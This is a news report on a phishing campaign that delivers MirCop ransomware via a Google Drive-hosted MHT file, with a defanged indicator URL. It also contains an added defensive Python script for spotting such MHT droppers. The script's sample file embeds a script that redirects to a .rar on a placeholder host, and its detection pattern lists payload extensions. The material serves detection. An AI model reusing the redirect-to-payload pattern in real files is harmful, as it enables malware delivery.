A phishing campaign that poses as supplier lists is delivering the MirCop ransomware to victims. Once the lure is opened, the attack encrypts the target PC in under fifteen minutes.
The attackers open with an unsolicited email to the victim that claims to follow up on an earlier order arrangement. The email body contains a Google Drive link which, when clicked, downloads an MHT file (a web-page archive) to the victim’s device.
Hosting the link on Google Drive lends the email credibility and matches how businesses routinely share documents. Simple but important choices like this decide, from the threat actors’ point of view, whether the victim clicks the link or consigns the email to the spam folder.
Opening the file shows nothing more than a blurred image of what looks like a supplier list, stamped and signed for added authenticity. In the background, the MHT file downloads a RAR archive from “hXXps://a[.]pomf[.]cat/gectpe.rar” that contains a .NET malware downloader.
The EXE in the RAR archive uses VBS scripts to drop and run the MirCop payload on the compromised machine. The ransomware immediately starts capturing screenshots, encrypts files, replaces the desktop wallpaper with a grisly zombie-themed image, and tells victims what to do next.
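The delivery chain above starts with an MHT file, which is simply a multipart/related MIME message, so it can be inspected with standard mail-parsing tools before it ever reaches a browser. The following Python script is an added example written for this page, not code from Cofense or from the campaign; it parses an MHT, lists its parts, and flags the combination that this lure relies on: an HTML part carrying a script plus a URL pointing at an archive or executable. The sample MHT, the host `example.invalid`, and the function name `analyze_mht` are constructed for illustration and are not indicators from the report.

```python
"""Inspect an MHT (MHTML web-archive) file for a script-driven remote
archive download, the delivery pattern described in the article.
MHT is multipart/related MIME, so the standard-library email package
is enough to walk its parts."""
import email
import re
from email import policy

# Constructed sample, NOT the real lure: one HTML part that shows an
# image and contains a script fetching a .rar from a placeholder host,
# plus the image part it references.
SAMPLE_MHT = b"""Subject: Supplier list
Snapshot-Content-Location: file:///C:/supplier_list.html
MIME-Version: 1.0
Content-Type: multipart/related; type="text/html"; boundary="----=_Part_0"

------=_Part_0
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: 7bit
Content-Location: file:///C:/supplier_list.html

<html><body>
<img src="cid:supplier_list.png" alt="supplier list">
<script>
  var u = "https://example.invalid/archive/gectpe.rar";
  window.location = u;
</script>
</body></html>
------=_Part_0
Content-Type: image/png
Content-Transfer-Encoding: base64
Content-ID: <supplier_list.png>

iVBORw0KGgo=
------=_Part_0--
"""

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
# Extensions worth flagging when a script points at them: archives,
# executables and the script hosts (VBS, HTA, ...) used in such chains.
PAYLOAD_EXT_RE = re.compile(r"\.(rar|zip|7z|exe|vbs|js|hta|scr)(\?|$)", re.IGNORECASE)
# Parts of these MIME types embedded directly in an MHT are never needed
# to render a saved web page.
EXEC_TYPES = {
    "application/x-msdownload",
    "application/octet-stream",
    "application/x-rar-compressed",
    "application/vnd.rar",
}


def analyze_mht(raw: bytes) -> dict:
    """Return a summary of the MHT's parts and a verdict on whether it
    looks like a script-driven dropper rather than a saved page."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = {
        "parts": [],            # content types in document order
        "script_parts": 0,      # text parts containing <script
        "payload_urls": [],     # URLs ending in an archive/executable extension
        "embedded_binaries": [],  # executable-ish MIME types found inline
        "suspicious": False,
    }
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        findings["parts"].append(ctype)
        if ctype in EXEC_TYPES:
            findings["embedded_binaries"].append(ctype)
            continue
        if not ctype.startswith("text/"):
            continue
        body = part.get_payload(decode=True) or b""
        text = body.decode(part.get_content_charset() or "utf-8", errors="replace")
        if "<script" in text.lower():
            findings["script_parts"] += 1
        for url in URL_RE.findall(text):
            if PAYLOAD_EXT_RE.search(url):
                findings["payload_urls"].append(url)
    # A saved web page may legitimately contain scripts or even links to
    # archives; the two together, or an inline binary, is what we flag.
    findings["suspicious"] = bool(
        (findings["script_parts"] and findings["payload_urls"])
        or findings["embedded_binaries"]
    )
    return findings


if __name__ == "__main__":
    import json
    print(json.dumps(analyze_mht(SAMPLE_MHT), indent=2))
```

Run it against a real sample with `analyze_mht(open(path, "rb").read())`. The heuristic is deliberately narrow: a script that redirects to or fetches an archive is the behaviour a supplier-list screenshot has no reason to exhibit, and the URLs it extracts are the indicators worth blocking at the proxy.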
Cofense reports that the whole chain, from the victim opening the phishing email to the files being encrypted, takes less than 15 minutes.
From that point on, the victim can only use specific web browsers to contact the actors and arrange the ransom payment.
The actors show little interest in infiltrating the victim’s computer quietly or persisting on it for long periods to conduct espionage or steal files for extortion. On the contrary, the attack is fast and its cause is obvious to the victim almost immediately.